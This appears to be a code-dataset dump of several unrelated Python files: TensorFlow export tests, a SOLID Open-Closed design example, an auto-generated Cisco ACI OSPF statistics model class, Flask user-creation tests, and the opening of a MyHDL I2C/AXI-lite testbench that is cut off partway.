"my_label": tf.constant([[1], [1]])
})
input_receiver_fn = export.build_supervised_input_receiver_fn_from_input_fn(
dummy_input_fn, feature_key="z")
with tf.Graph().as_default():
input_receiver = input_receiver_fn()
self.assertEqual(set(["z", "y"]), set(input_receiver.features.keys()))
self.assertEqual(set(["my_label"]), set(input_receiver.labels.keys()))
self.assertEqual(
set(["z", "y", "my_label"]),
set(input_receiver.receiver_tensors.keys()))
class TensorServingReceiverTest(tf.test.TestCase):
def test_tensor_serving_input_receiver_constructor(self):
features = tf.constant([0])
receiver_tensors = {
"example0": tf.constant(["test0"], name="example0"),
u"example1": tf.constant(["test1"], name="example1"),
}
r = export.TensorServingInputReceiver(features, receiver_tensors)
self.assertIsInstance(r.features, tf.Tensor)
self.assertIsInstance(r.receiver_tensors, dict)
def test_tensor_serving_input_receiver_sparse(self):
features = tf.sparse.SparseTensor(
indices=[[0, 0]], values=[1], dense_shape=[1, 1])
receiver_tensors = {
"example0": tf.constant(["test0"], name="example0"),
u"example1": tf.constant(["test1"], name="example1"),
}
r = export.TensorServingInputReceiver(features, receiver_tensors)
self.assertIsInstance(r.features, tf.sparse.SparseTensor)
self.assertIsInstance(r.receiver_tensors, dict)
def test_serving_input_receiver_features_invalid(self):
receiver_tensors = {
"example0": tf.constant(["test0"], name="example0"),
u"example1": tf.constant(["test1"], name="example1"),
}
with self.assertRaisesRegexp(ValueError, "features must be defined"):
export.TensorServingInputReceiver(
features=None, receiver_tensors=receiver_tensors)
with self.assertRaisesRegexp(ValueError, "feature must be a Tensor"):
export.TensorServingInputReceiver(
features={"1": tf.constant([1])}, receiver_tensors=receiver_tensors)
def test_serving_input_receiver_receiver_tensors_invalid(self):
features = tf.constant([0])
with self.assertRaisesRegexp(ValueError,
"receiver_tensors must be defined"):
export.TensorServingInputReceiver(
features=features, receiver_tensors=None)
with self.assertRaisesRegexp(ValueError,
"receiver_tensor keys must be strings"):
export.TensorServingInputReceiver(
features=features,
receiver_tensors={1: tf.constant(["test"], name="example0")})
with self.assertRaisesRegexp(ValueError,
"receiver_tensor example1 must be a Tensor"):
export.TensorServingInputReceiver(
features=features, receiver_tensors={"example1": [1]})
if __name__ == "__main__":
tf.test.main()
| [
"[email protected]"
] | |
6b249119fe1fb273f634b04060a01fd3b1d39ab2 | 74091dce735f281188d38d2f00d1a68e1d38ff7a | /des_pattern/solid/open_closed_products.py | 580caa39d9c24cf86d03055117d399a49d6ebe4b | [] | no_license | nbiadrytski-zz/python-training | 96741aa0ef37bda32d049fde5938191025fe2924 | 559a64aae2db51e11812cea5ff602f25953e8070 | refs/heads/master | 2023-05-07T04:08:23.898161 | 2019-12-10T12:12:59 | 2019-12-10T12:12:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,252 | py | from enum import Enum
from abc import ABCMeta, abstractmethod
# Open Closed:
# A class should be open for extension (usually by inheritance), but closed for modification
# which means it's not a good idea to change smth that is already properly working,
# but it's better to extend the functionality in a new class
class Color(Enum):
RED = 1
GREEN = 2
BLUE = 3
class Size(Enum):
SMALL = 1
MEDIUM = 2
LARGE = 3
class Product:
def __init__(self, name, color, size):
self.name = name
self.color = color
self.size = size
# Enterprise patterns: Specification (inheritance)
class Spec(metaclass=ABCMeta):
@abstractmethod
def is_satisfied(self, item):
"""Does an item satisfy the requirement?"""
pass
class Filter(metaclass=ABCMeta):
@abstractmethod
def filter(self, items, spec):
pass
class ColorSpec(Spec):
def __init__(self, color):
self.color = color
def is_satisfied(self, item):
return item.color == self.color
class SizeSpec(Spec):
def __init__(self, size):
self.size = size
def is_satisfied(self, item):
return item.size == self.size
class CombinedSpec(Spec):
def __init__(self, spec1, spec2):
self.spec2 = spec2
self.spec1 = spec1
def is_satisfied(self, item):
return self.spec1.is_satisfied(item) and self.spec2.is_satisfied(item)
class ProductFilter(Filter):
def filter(self, items, spec):
for item in items:
if spec.is_satisfied(item):
yield item
apple = Product('Apple', Color.GREEN, Size.SMALL)
tree = Product('Tree', Color.GREEN, Size.LARGE)
house = Product('House', Color.BLUE, Size.LARGE)
products = [apple, tree, house]
prod_filter = ProductFilter()
print('Green products:')
green = ColorSpec(Color.GREEN)
for p in prod_filter.filter(products, green):
print(f' - {p.name} is green')
print('Large products:')
large = SizeSpec(Size.LARGE)
for p in prod_filter.filter(products, large):
print(f' - {p.name} is large')
print('Large blue items:')
large_blue = CombinedSpec(large, ColorSpec(Color.BLUE))
for p in prod_filter.filter(products, large_blue):
print(f' - {p.name} is large and blue')
| [
"[email protected]"
] | |
dec24de5405f4f71820fe6d93f57980dca5268d8 | 24fe1f54fee3a3df952ca26cce839cc18124357a | /servicegraph/lib/python2.7/site-packages/acimodel-4.0_3d-py2.7.egg/cobra/modelimpl/ospf/dropunkstats1mo.py | ea481b7998b5e759da9b8dfb111dae63a3883847 | [] | no_license | aperiyed/servicegraph-cloudcenter | 4b8dc9e776f6814cf07fe966fbd4a3481d0f45ff | 9eb7975f2f6835e1c0528563a771526896306392 | refs/heads/master | 2023-05-10T17:27:18.022381 | 2020-01-20T09:18:28 | 2020-01-20T09:18:28 | 235,065,676 | 0 | 0 | null | 2023-05-01T21:19:14 | 2020-01-20T09:36:37 | Python | UTF-8 | Python | false | false | 21,275 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2019 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class DropUnkStats1mo(Mo):
"""
Mo doc not defined in techpub!!!
"""
meta = StatsClassMeta("cobra.model.ospf.DropUnkStats1mo", "Ospf Drop Unknown Packets")
counter = CounterMeta("unknownPktsRcvd", CounterCategory.COUNTER, "packets", "Unknown Packets Received")
counter._propRefs[PropCategory.IMPLICIT_LASTREADING] = "unknownPktsRcvdLast"
counter._propRefs[PropCategory.IMPLICIT_CUMULATIVE] = "unknownPktsRcvdCum"
counter._propRefs[PropCategory.IMPLICIT_PERIODIC] = "unknownPktsRcvdPer"
counter._propRefs[PropCategory.IMPLICIT_MIN] = "unknownPktsRcvdMin"
counter._propRefs[PropCategory.IMPLICIT_MAX] = "unknownPktsRcvdMax"
counter._propRefs[PropCategory.IMPLICIT_AVG] = "unknownPktsRcvdAvg"
counter._propRefs[PropCategory.IMPLICIT_SUSPECT] = "unknownPktsRcvdSpct"
counter._propRefs[PropCategory.IMPLICIT_BASELINE] = "unknownPktsRcvdBase"
counter._propRefs[PropCategory.IMPLICIT_THRESHOLDED] = "unknownPktsRcvdThr"
counter._propRefs[PropCategory.IMPLICIT_TREND_BASE] = "unknownPktsRcvdTrBase"
counter._propRefs[PropCategory.IMPLICIT_TREND] = "unknownPktsRcvdTr"
counter._propRefs[PropCategory.IMPLICIT_RATE] = "unknownPktsRcvdRate"
meta._counters.append(counter)
counter = CounterMeta("rcvdPktsDropped", CounterCategory.COUNTER, "packets", "Received Packets Dropped")
counter._propRefs[PropCategory.IMPLICIT_LASTREADING] = "rcvdPktsDroppedLast"
counter._propRefs[PropCategory.IMPLICIT_CUMULATIVE] = "rcvdPktsDroppedCum"
counter._propRefs[PropCategory.IMPLICIT_PERIODIC] = "rcvdPktsDroppedPer"
counter._propRefs[PropCategory.IMPLICIT_MIN] = "rcvdPktsDroppedMin"
counter._propRefs[PropCategory.IMPLICIT_MAX] = "rcvdPktsDroppedMax"
counter._propRefs[PropCategory.IMPLICIT_AVG] = "rcvdPktsDroppedAvg"
counter._propRefs[PropCategory.IMPLICIT_SUSPECT] = "rcvdPktsDroppedSpct"
counter._propRefs[PropCategory.IMPLICIT_BASELINE] = "rcvdPktsDroppedBase"
counter._propRefs[PropCategory.IMPLICIT_THRESHOLDED] = "rcvdPktsDroppedThr"
counter._propRefs[PropCategory.IMPLICIT_TREND_BASE] = "rcvdPktsDroppedTrBase"
counter._propRefs[PropCategory.IMPLICIT_TREND] = "rcvdPktsDroppedTr"
counter._propRefs[PropCategory.IMPLICIT_RATE] = "rcvdPktsDroppedRate"
meta._counters.append(counter)
meta.moClassName = "ospfDropUnkStats1mo"
meta.rnFormat = "CDospfDropUnkStats1mo"
meta.category = MoCategory.STATS_CURRENT
meta.label = "current Ospf Drop Unknown Packets stats in 1 month"
meta.writeAccessMask = 0x8008020040001
meta.readAccessMask = 0x8008020040001
meta.isDomainable = False
meta.isReadOnly = True
meta.isConfigurable = False
meta.isDeletable = False
meta.isContextRoot = True
meta.parentClasses.add("cobra.model.ospf.IfStats")
meta.superClasses.add("cobra.model.ospf.DropUnkStats")
meta.superClasses.add("cobra.model.stats.Item")
meta.superClasses.add("cobra.model.stats.Curr")
meta.rnPrefixes = [
('CDospfDropUnkStats1mo', False),
]
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "cnt", "cnt", 16212, PropCategory.REGULAR)
prop.label = "Number of Collections During this Interval"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("cnt", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "lastCollOffset", "lastCollOffset", 111, PropCategory.REGULAR)
prop.label = "Collection Length"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("lastCollOffset", prop)
prop = PropMeta("str", "modTs", "modTs", 7, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "never"
prop._addConstant("never", "never", 0)
meta.props.add("modTs", prop)
prop = PropMeta("str", "rcvdPktsDroppedAvg", "rcvdPktsDroppedAvg", 48386, PropCategory.IMPLICIT_AVG)
prop.label = "Received Packets Dropped average value"
prop.isOper = True
prop.isStats = True
meta.props.add("rcvdPktsDroppedAvg", prop)
prop = PropMeta("str", "rcvdPktsDroppedBase", "rcvdPktsDroppedBase", 48381, PropCategory.IMPLICIT_BASELINE)
prop.label = "Received Packets Dropped baseline"
prop.isOper = True
prop.isStats = True
meta.props.add("rcvdPktsDroppedBase", prop)
prop = PropMeta("str", "rcvdPktsDroppedCum", "rcvdPktsDroppedCum", 48382, PropCategory.IMPLICIT_CUMULATIVE)
prop.label = "Received Packets Dropped cumulative"
prop.isOper = True
prop.isStats = True
meta.props.add("rcvdPktsDroppedCum", prop)
prop = PropMeta("str", "rcvdPktsDroppedLast", "rcvdPktsDroppedLast", 48380, PropCategory.IMPLICIT_LASTREADING)
prop.label = "Received Packets Dropped current value"
prop.isOper = True
prop.isStats = True
meta.props.add("rcvdPktsDroppedLast", prop)
prop = PropMeta("str", "rcvdPktsDroppedMax", "rcvdPktsDroppedMax", 48385, PropCategory.IMPLICIT_MAX)
prop.label = "Received Packets Dropped maximum value"
prop.isOper = True
prop.isStats = True
meta.props.add("rcvdPktsDroppedMax", prop)
prop = PropMeta("str", "rcvdPktsDroppedMin", "rcvdPktsDroppedMin", 48384, PropCategory.IMPLICIT_MIN)
prop.label = "Received Packets Dropped minimum value"
prop.isOper = True
prop.isStats = True
meta.props.add("rcvdPktsDroppedMin", prop)
prop = PropMeta("str", "rcvdPktsDroppedPer", "rcvdPktsDroppedPer", 48383, PropCategory.IMPLICIT_PERIODIC)
prop.label = "Received Packets Dropped periodic"
prop.isOper = True
prop.isStats = True
meta.props.add("rcvdPktsDroppedPer", prop)
prop = PropMeta("str", "rcvdPktsDroppedRate", "rcvdPktsDroppedRate", 48391, PropCategory.IMPLICIT_RATE)
prop.label = "Received Packets Dropped rate"
prop.isOper = True
prop.isStats = True
meta.props.add("rcvdPktsDroppedRate", prop)
prop = PropMeta("str", "rcvdPktsDroppedSpct", "rcvdPktsDroppedSpct", 48387, PropCategory.IMPLICIT_SUSPECT)
prop.label = "Received Packets Dropped suspect count"
prop.isOper = True
prop.isStats = True
meta.props.add("rcvdPktsDroppedSpct", prop)
prop = PropMeta("str", "rcvdPktsDroppedThr", "rcvdPktsDroppedThr", 48388, PropCategory.IMPLICIT_THRESHOLDED)
prop.label = "Received Packets Dropped thresholded flags"
prop.isOper = True
prop.isStats = True
prop.defaultValue = 0
prop.defaultValueStr = "unspecified"
prop._addConstant("avgCrit", "avg-severity-critical", 2199023255552)
prop._addConstant("avgHigh", "avg-crossed-high-threshold", 68719476736)
prop._addConstant("avgLow", "avg-crossed-low-threshold", 137438953472)
prop._addConstant("avgMajor", "avg-severity-major", 1099511627776)
prop._addConstant("avgMinor", "avg-severity-minor", 549755813888)
prop._addConstant("avgRecovering", "avg-recovering", 34359738368)
prop._addConstant("avgWarn", "avg-severity-warning", 274877906944)
prop._addConstant("cumulativeCrit", "cumulative-severity-critical", 8192)
prop._addConstant("cumulativeHigh", "cumulative-crossed-high-threshold", 256)
prop._addConstant("cumulativeLow", "cumulative-crossed-low-threshold", 512)
prop._addConstant("cumulativeMajor", "cumulative-severity-major", 4096)
prop._addConstant("cumulativeMinor", "cumulative-severity-minor", 2048)
prop._addConstant("cumulativeRecovering", "cumulative-recovering", 128)
prop._addConstant("cumulativeWarn", "cumulative-severity-warning", 1024)
prop._addConstant("lastReadingCrit", "lastreading-severity-critical", 64)
prop._addConstant("lastReadingHigh", "lastreading-crossed-high-threshold", 2)
prop._addConstant("lastReadingLow", "lastreading-crossed-low-threshold", 4)
prop._addConstant("lastReadingMajor", "lastreading-severity-major", 32)
prop._addConstant("lastReadingMinor", "lastreading-severity-minor", 16)
prop._addConstant("lastReadingRecovering", "lastreading-recovering", 1)
prop._addConstant("lastReadingWarn", "lastreading-severity-warning", 8)
prop._addConstant("maxCrit", "max-severity-critical", 17179869184)
prop._addConstant("maxHigh", "max-crossed-high-threshold", 536870912)
prop._addConstant("maxLow", "max-crossed-low-threshold", 1073741824)
prop._addConstant("maxMajor", "max-severity-major", 8589934592)
prop._addConstant("maxMinor", "max-severity-minor", 4294967296)
prop._addConstant("maxRecovering", "max-recovering", 268435456)
prop._addConstant("maxWarn", "max-severity-warning", 2147483648)
prop._addConstant("minCrit", "min-severity-critical", 134217728)
prop._addConstant("minHigh", "min-crossed-high-threshold", 4194304)
prop._addConstant("minLow", "min-crossed-low-threshold", 8388608)
prop._addConstant("minMajor", "min-severity-major", 67108864)
prop._addConstant("minMinor", "min-severity-minor", 33554432)
prop._addConstant("minRecovering", "min-recovering", 2097152)
prop._addConstant("minWarn", "min-severity-warning", 16777216)
prop._addConstant("periodicCrit", "periodic-severity-critical", 1048576)
prop._addConstant("periodicHigh", "periodic-crossed-high-threshold", 32768)
prop._addConstant("periodicLow", "periodic-crossed-low-threshold", 65536)
prop._addConstant("periodicMajor", "periodic-severity-major", 524288)
prop._addConstant("periodicMinor", "periodic-severity-minor", 262144)
prop._addConstant("periodicRecovering", "periodic-recovering", 16384)
prop._addConstant("periodicWarn", "periodic-severity-warning", 131072)
prop._addConstant("rateCrit", "rate-severity-critical", 36028797018963968)
prop._addConstant("rateHigh", "rate-crossed-high-threshold", 1125899906842624)
prop._addConstant("rateLow", "rate-crossed-low-threshold", 2251799813685248)
prop._addConstant("rateMajor", "rate-severity-major", 18014398509481984)
prop._addConstant("rateMinor", "rate-severity-minor", 9007199254740992)
prop._addConstant("rateRecovering", "rate-recovering", 562949953421312)
prop._addConstant("rateWarn", "rate-severity-warning", 4503599627370496)
prop._addConstant("trendCrit", "trend-severity-critical", 281474976710656)
prop._addConstant("trendHigh", "trend-crossed-high-threshold", 8796093022208)
prop._addConstant("trendLow", "trend-crossed-low-threshold", 17592186044416)
prop._addConstant("trendMajor", "trend-severity-major", 140737488355328)
prop._addConstant("trendMinor", "trend-severity-minor", 70368744177664)
prop._addConstant("trendRecovering", "trend-recovering", 4398046511104)
prop._addConstant("trendWarn", "trend-severity-warning", 35184372088832)
prop._addConstant("unspecified", None, 0)
meta.props.add("rcvdPktsDroppedThr", prop)
prop = PropMeta("str", "rcvdPktsDroppedTr", "rcvdPktsDroppedTr", 48390, PropCategory.IMPLICIT_TREND)
prop.label = "Received Packets Dropped trend"
prop.isOper = True
prop.isStats = True
meta.props.add("rcvdPktsDroppedTr", prop)
prop = PropMeta("str", "rcvdPktsDroppedTrBase", "rcvdPktsDroppedTrBase", 48389, PropCategory.IMPLICIT_TREND_BASE)
prop.label = "Received Packets Dropped trend baseline"
prop.isOper = True
prop.isStats = True
meta.props.add("rcvdPktsDroppedTrBase", prop)
prop = PropMeta("str", "repIntvEnd", "repIntvEnd", 110, PropCategory.REGULAR)
prop.label = "Reporting End Time"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("repIntvEnd", prop)
prop = PropMeta("str", "repIntvStart", "repIntvStart", 109, PropCategory.REGULAR)
prop.label = "Reporting Start Time"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("repIntvStart", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
prop = PropMeta("str", "unknownPktsRcvdAvg", "unknownPktsRcvdAvg", 48407, PropCategory.IMPLICIT_AVG)
prop.label = "Unknown Packets Received average value"
prop.isOper = True
prop.isStats = True
meta.props.add("unknownPktsRcvdAvg", prop)
prop = PropMeta("str", "unknownPktsRcvdBase", "unknownPktsRcvdBase", 48402, PropCategory.IMPLICIT_BASELINE)
prop.label = "Unknown Packets Received baseline"
prop.isOper = True
prop.isStats = True
meta.props.add("unknownPktsRcvdBase", prop)
prop = PropMeta("str", "unknownPktsRcvdCum", "unknownPktsRcvdCum", 48403, PropCategory.IMPLICIT_CUMULATIVE)
prop.label = "Unknown Packets Received cumulative"
prop.isOper = True
prop.isStats = True
meta.props.add("unknownPktsRcvdCum", prop)
prop = PropMeta("str", "unknownPktsRcvdLast", "unknownPktsRcvdLast", 48401, PropCategory.IMPLICIT_LASTREADING)
prop.label = "Unknown Packets Received current value"
prop.isOper = True
prop.isStats = True
meta.props.add("unknownPktsRcvdLast", prop)
prop = PropMeta("str", "unknownPktsRcvdMax", "unknownPktsRcvdMax", 48406, PropCategory.IMPLICIT_MAX)
prop.label = "Unknown Packets Received maximum value"
prop.isOper = True
prop.isStats = True
meta.props.add("unknownPktsRcvdMax", prop)
prop = PropMeta("str", "unknownPktsRcvdMin", "unknownPktsRcvdMin", 48405, PropCategory.IMPLICIT_MIN)
prop.label = "Unknown Packets Received minimum value"
prop.isOper = True
prop.isStats = True
meta.props.add("unknownPktsRcvdMin", prop)
prop = PropMeta("str", "unknownPktsRcvdPer", "unknownPktsRcvdPer", 48404, PropCategory.IMPLICIT_PERIODIC)
prop.label = "Unknown Packets Received periodic"
prop.isOper = True
prop.isStats = True
meta.props.add("unknownPktsRcvdPer", prop)
prop = PropMeta("str", "unknownPktsRcvdRate", "unknownPktsRcvdRate", 48412, PropCategory.IMPLICIT_RATE)
prop.label = "Unknown Packets Received rate"
prop.isOper = True
prop.isStats = True
meta.props.add("unknownPktsRcvdRate", prop)
prop = PropMeta("str", "unknownPktsRcvdSpct", "unknownPktsRcvdSpct", 48408, PropCategory.IMPLICIT_SUSPECT)
prop.label = "Unknown Packets Received suspect count"
prop.isOper = True
prop.isStats = True
meta.props.add("unknownPktsRcvdSpct", prop)
prop = PropMeta("str", "unknownPktsRcvdThr", "unknownPktsRcvdThr", 48409, PropCategory.IMPLICIT_THRESHOLDED)
prop.label = "Unknown Packets Received thresholded flags"
prop.isOper = True
prop.isStats = True
prop.defaultValue = 0
prop.defaultValueStr = "unspecified"
prop._addConstant("avgCrit", "avg-severity-critical", 2199023255552)
prop._addConstant("avgHigh", "avg-crossed-high-threshold", 68719476736)
prop._addConstant("avgLow", "avg-crossed-low-threshold", 137438953472)
prop._addConstant("avgMajor", "avg-severity-major", 1099511627776)
prop._addConstant("avgMinor", "avg-severity-minor", 549755813888)
prop._addConstant("avgRecovering", "avg-recovering", 34359738368)
prop._addConstant("avgWarn", "avg-severity-warning", 274877906944)
prop._addConstant("cumulativeCrit", "cumulative-severity-critical", 8192)
prop._addConstant("cumulativeHigh", "cumulative-crossed-high-threshold", 256)
prop._addConstant("cumulativeLow", "cumulative-crossed-low-threshold", 512)
prop._addConstant("cumulativeMajor", "cumulative-severity-major", 4096)
prop._addConstant("cumulativeMinor", "cumulative-severity-minor", 2048)
prop._addConstant("cumulativeRecovering", "cumulative-recovering", 128)
prop._addConstant("cumulativeWarn", "cumulative-severity-warning", 1024)
prop._addConstant("lastReadingCrit", "lastreading-severity-critical", 64)
prop._addConstant("lastReadingHigh", "lastreading-crossed-high-threshold", 2)
prop._addConstant("lastReadingLow", "lastreading-crossed-low-threshold", 4)
prop._addConstant("lastReadingMajor", "lastreading-severity-major", 32)
prop._addConstant("lastReadingMinor", "lastreading-severity-minor", 16)
prop._addConstant("lastReadingRecovering", "lastreading-recovering", 1)
prop._addConstant("lastReadingWarn", "lastreading-severity-warning", 8)
prop._addConstant("maxCrit", "max-severity-critical", 17179869184)
prop._addConstant("maxHigh", "max-crossed-high-threshold", 536870912)
prop._addConstant("maxLow", "max-crossed-low-threshold", 1073741824)
prop._addConstant("maxMajor", "max-severity-major", 8589934592)
prop._addConstant("maxMinor", "max-severity-minor", 4294967296)
prop._addConstant("maxRecovering", "max-recovering", 268435456)
prop._addConstant("maxWarn", "max-severity-warning", 2147483648)
prop._addConstant("minCrit", "min-severity-critical", 134217728)
prop._addConstant("minHigh", "min-crossed-high-threshold", 4194304)
prop._addConstant("minLow", "min-crossed-low-threshold", 8388608)
prop._addConstant("minMajor", "min-severity-major", 67108864)
prop._addConstant("minMinor", "min-severity-minor", 33554432)
prop._addConstant("minRecovering", "min-recovering", 2097152)
prop._addConstant("minWarn", "min-severity-warning", 16777216)
prop._addConstant("periodicCrit", "periodic-severity-critical", 1048576)
prop._addConstant("periodicHigh", "periodic-crossed-high-threshold", 32768)
prop._addConstant("periodicLow", "periodic-crossed-low-threshold", 65536)
prop._addConstant("periodicMajor", "periodic-severity-major", 524288)
prop._addConstant("periodicMinor", "periodic-severity-minor", 262144)
prop._addConstant("periodicRecovering", "periodic-recovering", 16384)
prop._addConstant("periodicWarn", "periodic-severity-warning", 131072)
prop._addConstant("rateCrit", "rate-severity-critical", 36028797018963968)
prop._addConstant("rateHigh", "rate-crossed-high-threshold", 1125899906842624)
prop._addConstant("rateLow", "rate-crossed-low-threshold", 2251799813685248)
prop._addConstant("rateMajor", "rate-severity-major", 18014398509481984)
prop._addConstant("rateMinor", "rate-severity-minor", 9007199254740992)
prop._addConstant("rateRecovering", "rate-recovering", 562949953421312)
prop._addConstant("rateWarn", "rate-severity-warning", 4503599627370496)
prop._addConstant("trendCrit", "trend-severity-critical", 281474976710656)
prop._addConstant("trendHigh", "trend-crossed-high-threshold", 8796093022208)
prop._addConstant("trendLow", "trend-crossed-low-threshold", 17592186044416)
prop._addConstant("trendMajor", "trend-severity-major", 140737488355328)
prop._addConstant("trendMinor", "trend-severity-minor", 70368744177664)
prop._addConstant("trendRecovering", "trend-recovering", 4398046511104)
prop._addConstant("trendWarn", "trend-severity-warning", 35184372088832)
prop._addConstant("unspecified", None, 0)
meta.props.add("unknownPktsRcvdThr", prop)
prop = PropMeta("str", "unknownPktsRcvdTr", "unknownPktsRcvdTr", 48411, PropCategory.IMPLICIT_TREND)
prop.label = "Unknown Packets Received trend"
prop.isOper = True
prop.isStats = True
meta.props.add("unknownPktsRcvdTr", prop)
prop = PropMeta("str", "unknownPktsRcvdTrBase", "unknownPktsRcvdTrBase", 48410, PropCategory.IMPLICIT_TREND_BASE)
prop.label = "Unknown Packets Received trend baseline"
prop.isOper = True
prop.isStats = True
meta.props.add("unknownPktsRcvdTrBase", prop)
def __init__(self, parentMoOrDn, markDirty=True, **creationProps):
namingVals = []
Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
| [
"[email protected]"
] | |
a14bb37817d7bb4c8f4df5839311ba45d1fd581c | b30e399b7d687833126ebe4f5c8dd4ab49e2a5e7 | /tests/test_create_user.py | 3d1601cc2571d55b5034d477d3adc11f4ceda8fd | [] | no_license | riquellopes/desafio-python | ccd43101403349e5103499a59136c2e00d67d9af | f512923b7f4b0fa6f092f31693d4480a241849aa | refs/heads/master | 2021-01-17T17:16:28.486179 | 2016-10-10T12:40:22 | 2016-10-10T12:40:22 | 70,359,863 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,669 | py | import json
def test_should_be_returned_a_valid_dict(test_client, mocker):
os = mocker.patch("app.models.os")
os.environ.get.return_value = "desafio_python"
data = {
"name": "João da Silva",
"email": "[email protected]",
"password": "hunter2",
"phones": [{"number": "987654321", "ddd": "21"}]
}
response = test_client.post("/user", data=json.dumps(data), content_type='application/json')
assert response.status_code == 201
data = json.loads(response.data.decode('utf-8'))
assert "id" in data
assert "created" in data
assert "modified" in data
assert "last_login" in data
assert "token" in data
def test_should_be_returned_error_message(test_client, mocker):
os = mocker.patch("app.models.os")
os.environ.get.return_value = "desafio_python"
data = {
"name": "João da Silva",
"email": "[email protected]",
"password": "hunter2",
"phones": [{"number": "987654321", "ddd": "21"}]
}
response = test_client.post("/user", data=json.dumps(data), content_type='application/json')
assert response.status_code == 422
data = json.loads(response.data.decode('utf-8'))
assert data['mensagem'] == "E-mail já existente"
def test_should_be_get_error_message_when_no_data(test_client, mocker):
os = mocker.patch("app.models.os")
os.environ.get.return_value = "desafio_python"
response = test_client.post("/user", content_type='application/json')
assert response.status_code == 422
data = json.loads(response.data.decode('utf-8'))
assert data['mensagem'] == "Algumas informações não foram preenchidas."
| [
"[email protected]"
] | |
9c203851de27124bc30ae1fbbd530b8817b1f1ed | 4fa1acf1addaca8afa5c77ebde173af2f849eb2e | /tb/test_i2c_slave_axil_master.py | 2992353b6fe002d4238e5d0bceb50276cac474c3 | [
"MIT"
] | permissive | alexforencich/verilog-i2c | fb6ef3368cf595439d1b81b5080639bec0c71af7 | e7a26811e71de2bfa25ba704a1031c2bff9e5c31 | refs/heads/master | 2023-08-08T16:21:10.221616 | 2023-07-19T23:38:40 | 2023-07-19T23:38:40 | 19,449,788 | 389 | 151 | MIT | 2023-01-11T21:39:28 | 2014-05-05T08:49:01 | Verilog | UTF-8 | Python | false | false | 11,021 | py | #!/usr/bin/env python
"""
Copyright (c) 2019 Alex Forencich
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from myhdl import *
import os
import struct
import i2c
import axil
module = 'i2c_slave_axil_master'
testbench = 'test_%s' % module
srcs = []
srcs.append("../rtl/%s.v" % module)
srcs.append("../rtl/i2c_slave.v")
srcs.append("%s.v" % testbench)
src = ' '.join(srcs)
build_cmd = "iverilog -o %s.vvp %s" % (testbench, src)
def bench():
# Parameters
FILTER_LEN = 4
DATA_WIDTH = 32
ADDR_WIDTH = 16
STRB_WIDTH = (DATA_WIDTH/8)
# Inputs
clk = Signal(bool(0))
rst = Signal(bool(0))
current_test = Signal(intbv(0)[8:])
i2c_scl_i = Signal(bool(1))
i2c_sda_i = Signal(bool(1))
m_axil_awready = Signal(bool(0))
m_axil_wready = Signal(bool(0))
m_axil_bresp = Signal(intbv(0)[2:])
m_axil_bvalid = Signal(bool(0))
m_axil_arready = Signal(bool(0))
m_axil_rdata = Signal(intbv(0)[DATA_WIDTH:])
m_axil_rresp = Signal(intbv(0)[2:])
m_axil_rvalid = Signal(bool(0))
enable = Signal(bool(0))
device_address = Signal(intbv(0)[7:])
m_scl_i = Signal(bool(1))
m_sda_i = Signal(bool(1))
s2_scl_i = Signal(bool(1))
s2_sda_i = Signal(bool(1))
# Outputs
i2c_scl_o = Signal(bool(1))
i2c_scl_t = Signal(bool(1))
i2c_sda_o = Signal(bool(1))
i2c_sda_t = Signal(bool(1))
m_axil_awaddr = Signal(intbv(0)[ADDR_WIDTH:])
m_axil_awprot = Signal(intbv(0)[3:])
m_axil_awvalid = Signal(bool(0))
